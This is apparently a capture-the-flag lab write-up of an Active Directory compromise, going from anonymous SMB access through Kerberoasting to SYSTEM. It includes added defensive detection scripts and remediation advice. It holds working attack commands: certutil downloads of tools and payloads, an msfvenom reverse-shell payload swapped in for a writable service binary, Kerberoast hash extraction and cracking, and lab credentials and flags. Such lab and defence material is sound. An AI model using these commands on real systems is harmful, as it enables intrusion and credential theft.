From Anonymous SMB Access to SYSTEM-Level Control

1. Overview

This assessment demonstrates a complete compromise of an Active Directory environment, beginning with unauthenticated access and progressing through credential harvesting, OSINT exploitation, Kerberoasting, and privilege escalation to achieve SYSTEM-level access.

The attack chain highlights how multiple low-severity misconfigurations can be chained together to achieve full domain compromise.

2. Initial Reconnaissance

Nmap Scan

nmap -A <IP> -T5

Key Observations:

  • Host identified as a Domain Controller: LAB-DC
  • Domain: LAB.ENTERPRISE.THM
  • Key services exposed:
      • Kerberos (88)
      • LDAP (389, 3268)
      • SMB (445)
      • RDP (3389)
      • HTTP (80 — Microsoft IIS)

This confirms the target is part of an Active Directory infrastructure.

3. Environment Configuration

Hosts File Update

nano /etc/hosts
<IP> enterprise.thm lab.enterprise.thm lab-dc.lab.enterprise.thm

4. SMB Enumeration

Anonymous Share Enumeration

smbclient -L //<IP>/ -N

Discovered Shares:

  • ADMIN$
  • C$
  • NETLOGON
  • SYSVOL
  • Users

Anonymous access to SMB shares is enabled, which is a critical misconfiguration.

Accessing the Users Share

smbclient //<IP>/Users -N
ls
cd LAB-ADMIN
ls

Identified Users:

  • Administrator
  • LAB-ADMIN
  • bitbucket
  • atlbitbucket

5. Credential Discovery via PowerShell History

Navigating to PowerShell History

Within the smbclient session (starting from the LAB-ADMIN directory):

cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
ls
get Consolehost_history.txt

Locally, after the download:

cat Consolehost_history.txt

Extracted Credentials:

replication:101RepAdmin123!!

Credential Validation

crackmapexec smb <IP> -u 'replication' -p '101RepAdmin123!!'

The credentials were not valid for SMB access, requiring further pivoting.

6. Web Enumeration and OSINT Pivot

Web Application Discovery


The page indicated a migration to GitHub.

GitHub Enumeration

  • Organization: Enterprise-THM
  • User: Nik-enterprise-dev

Repository Discovery


Repository identified:

mgmtScript.ps1

7. Credential Exposure via Git History

Cloning Repository

git clone https://github.com/Nik-enterprise-dev/mgmtScript.ps1.git
cd mgmtScript.ps1
git log -p

Sensitive Data Identified:

$userName = 'nik'
$userPassword = 'ToastyBoi!'

Credential Validation

nxc smb <IP> -u nik -p 'ToastyBoi!'

Valid credentials obtained for domain user nik.
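The finding above is the reason "remove sensitive data from repositories and history" is listed later: deleting a hardcoded password in a new commit leaves it in every earlier commit. The following is an added example (not code from the page or from the Nik-enterprise-dev repository) that scans `git log -p` text for PowerShell secret assignments; the commit ids and diff excerpt are constructed.

```python
import re

# Constructed excerpt in the shape of `git log -p` output (not the real repository's
# history): a later commit deletes the hardcoded password, but the earlier commit
# that introduced it is still in the history and still yields the secret.
SAMPLE_GIT_LOG = """\
commit b2b2b2 (constructed)
    remove hardcoded creds
-$userName = 'nik'
-$userPassword = 'ToastyBoi!'
+$userName = Read-Host 'User'
+$userPassword = Read-Host 'Password' -AsSecureString
commit a1a1a1 (constructed)
    initial script
+$userName = 'nik'
+$userPassword = 'ToastyBoi!'
"""

# A PowerShell variable whose name suggests a secret, assigned a quoted literal.
# The leading +/- is optional so both added and removed diff lines are inspected.
SECRET_ASSIGN = re.compile(
    r"""^[+-]?\s*\$(?P<name>\w*(?:pass|pwd|secret|token|key)\w*)\s*=\s*['"](?P<value>[^'"]+)['"]""",
    re.IGNORECASE,
)

def find_secrets_in_history(log_text):
    """Return one finding per literal secret assignment, tagged with the commit
    it appears in and whether that diff line was adding or removing it."""
    findings, commit = [], None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
            continue
        m = SECRET_ASSIGN.match(line)
        if m:
            findings.append({"commit": commit, "variable": m.group("name"),
                             "value": m.group("value"),
                             "removed_in_diff": line.startswith("-")})
    return findings

def still_recoverable(log_text):
    """Secret values that remain retrievable from history even if a later commit
    removed them: the reason history must be rewritten, not just the file edited."""
    return sorted({f["value"] for f in find_secrets_in_history(log_text)})
```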

8. Kerberoasting Attack

SPN Enumeration

impacket-GetUserSPNs LAB.ENTERPRISE.THM/nik:ToastyBoi! -dc-ip <IP> -request -outputfile Output_hash.txt

Extracted Hash

The TGS-REP hash for the service account was written to Output_hash.txt for offline cracking.

Hash Cracking

hashcat -m 13100 Output_hash.txt /usr/share/wordlists/rockyou.txt

Cracked Credentials:

bitbucket : littleredbucket
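On the defender's side, the SPN request and hash extraction above leave a trace: Security event 4769 on the domain controller records each service ticket issued, including its encryption type. This added example (not from the page) runs a simple Kerberoasting detection over constructed 4769 records; the account names, times and fields are assumed for illustration.

```python
from collections import defaultdict

# Constructed Security event 4769 (service ticket request) records, reduced to the
# fields the detection needs; not logs captured from LAB-DC. etype 0x17 is RC4-HMAC,
# 0x12 is AES256; krbtgt and computer ($) accounts are ignored as normal traffic.
EVENTS_4769 = [
    {"time": 100, "account": "nik@LAB.ENTERPRISE.THM",  "service": "bitbucket",    "etype": "0x17", "status": "0x0"},
    {"time": 101, "account": "nik@LAB.ENTERPRISE.THM",  "service": "atlbitbucket", "etype": "0x17", "status": "0x0"},
    {"time": 102, "account": "nik@LAB.ENTERPRISE.THM",  "service": "LAB-DC$",      "etype": "0x12", "status": "0x0"},
    {"time": 500, "account": "jdoe@LAB.ENTERPRISE.THM", "service": "krbtgt",       "etype": "0x17", "status": "0x0"},
    {"time": 900, "account": "jdoe@LAB.ENTERPRISE.THM", "service": "bitbucket",    "etype": "0x17", "status": "0x0"},
]

def is_roastable_request(ev):
    """Successfully issued RC4 service ticket for a user-style SPN account:
    the ticket format that hashcat mode 13100 cracks offline."""
    svc = ev["service"]
    return (ev["etype"].lower() == "0x17" and ev["status"] == "0x0"
            and svc.lower() != "krbtgt" and not svc.endswith("$"))

def kerberoast_candidates(events, window=60, threshold=2):
    """Map requester -> sorted distinct services when one account obtains at least
    `threshold` roastable tickets for distinct services within `window` seconds.
    A single RC4 ticket (jdoe at t=900) stays below the default threshold."""
    per_account = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_roastable_request(ev):
            per_account[ev["account"]].append(ev)
    hits = {}
    for account, evs in per_account.items():
        for i, start in enumerate(evs):
            services = {e["service"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(services) >= threshold:
                hits[account] = sorted(services)
                break
    return hits
```

Lowering the threshold to 1 reports every RC4 service ticket, which is a reasonable baseline once AES is enforced on service accounts.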

9. Initial Access via RDP

Credential Validation

nxc rdp <IP> -u bitbucket -p 'littleredbucket'

RDP Access

xfreerdp3 /u:bitbucket /p:littleredbucket /v:<IP>

User Flag

THM{ed882d02b34246536ef7da79062bef36}

10. Privilege Escalation Enumeration

Transfer WinPEAS

Attacker machine:

python3 -m http.server 80

Target machine:

certutil -urlcache -f http://<IP>/winPEASany.exe winpeas.exe

Execute WinPEAS

.\winpeas.exe

11. Privilege Escalation

Service Misconfiguration Discovery

icacls "C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe"

Finding:

  • Writable permissions assigned to low-privileged users

This allows service binary replacement.

Payload Generation

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o ZeroTier_One.exe

Transfer Payload

certutil -urlcache -f http://<IP>/ZeroTier_One.exe ZeroTier_One.exe

Replace Service Binary

copy-item .\ZeroTier_One.exe "C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe" -Force

Restart Service

net stop ZeroTierOneService
net start ZeroTierOneService
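The icacls finding that made this escalation possible is straightforward to audit before an attacker does. This added example (not from the page) parses icacls output for service binaries and flags ACEs that give low-privileged principals write-class rights; the sample output, including the ACL on the ZeroTier path, is constructed rather than captured from the target.

```python
import re
# Principals every low-privileged logon belongs to; write rights for them on a binary a
# service runs as SYSTEM is the finding icacls revealed above.
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users",
            r"nt authority\interactive"}
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "D"}  # rights that change file or ACL

# Constructed icacls output for two files (not captured from the target). icacls pads
# continuation ACEs to len(path)+1 columns, which is what makes the first line splittable.
SVC_EXE = r"C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe"
SAFE_EXE = r"C:\Windows\notepad.exe"
SAMPLE_ICACLS = "\n".join([
    SVC_EXE + r" BUILTIN\Users:(I)(F)",
    " " * (len(SVC_EXE) + 1) + r"NT AUTHORITY\SYSTEM:(I)(F)",
    " " * (len(SVC_EXE) + 1) + r"BUILTIN\Administrators:(I)(F)",
    "",
    SAFE_EXE + r" NT AUTHORITY\SYSTEM:(I)(F)",
    " " * (len(SAFE_EXE) + 1) + r"BUILTIN\Users:(I)(RX)",
    "",
    "Successfully processed 2 files; Failed processing 0 files",
])

def parse_icacls(output):
    """Return [(path, principal, [rights...])] for every ACE in icacls output."""
    blocks, current = [], []
    for line in output.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if line.startswith(" ") and current:
            current.append(line)          # continuation ACE of the current file
        else:
            if current:
                blocks.append(current)
            current = [line]              # new file: path followed by its first ACE
    if current:
        blocks.append(current)
    entries = []
    for block in blocks:
        first, rest = block[0], block[1:]
        # Continuation indentation marks where the path ends; with a single ACE fall
        # back to the last space (correct only when the principal has no spaces).
        indent = len(rest[0]) - len(rest[0].lstrip()) if rest else first.rfind(" ") + 1
        path, aces = first[:indent - 1], [first[indent:]] + [l.strip() for l in rest]
        for ace in aces:
            principal, _, rights = ace.partition(":")
            tokens = [t for grp in re.findall(r"\(([^)]*)\)", rights) for t in grp.split(",")]
            entries.append((path, principal.strip(), tokens))
    return entries

def writable_by_low_priv(output):
    """ACEs granting low-privileged principals write-class rights on the audited binaries."""
    return [(p, who, sorted(set(r) & WRITE_RIGHTS)) for p, who, r in parse_icacls(output)
            if who.lower() in LOW_PRIV and set(r) & WRITE_RIGHTS]
```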

12. SYSTEM Shell

Listener Setup

nc -lvnp 4444

Reverse Shell Received

whoami
nt authority\system

13. Root Flag

Access Administrator Desktop

cd C:\Users\Administrator\Desktop
dir
type root.txt
THM{1a1fa94875421296331f145971ca4881}

14. Attack Chain Summary

  1. Anonymous SMB access enabled
  2. User enumeration via shared directories
  3. Credential discovery through PowerShell history
  4. Web enumeration leading to GitHub OSINT
  5. Credential exposure in Git commit history
  6. Kerberoasting attack on service account
  7. RDP access using cracked credentials
  8. Privilege escalation via writable service binary
  9. Reverse shell execution as SYSTEM
  10. Full system compromise and flag retrieval

15. Key Security Findings

  • Anonymous SMB access allowed
  • Credentials stored in PowerShell history
  • Secrets exposed in public Git repositories
  • Weak Kerberos service account configuration
  • Writable service binaries
  • Lack of privilege separation

16. Recommendations

  • Disable anonymous SMB access
  • Enforce credential hygiene and secure storage
  • Remove sensitive data from repositories and history
  • Implement strong Kerberos policies and service account controls
  • Restrict file system permissions on service binaries
  • Deploy endpoint monitoring and logging solutions

17. Conclusion

This assessment demonstrates how multiple minor weaknesses can be chained into a full compromise of an Active Directory environment.

The attack required no exploit development, relying entirely on:

  • Misconfigurations
  • Poor credential management
  • Lack of access control enforcement

This emphasizes the importance of defense-in-depth and continuous security auditing within enterprise environments.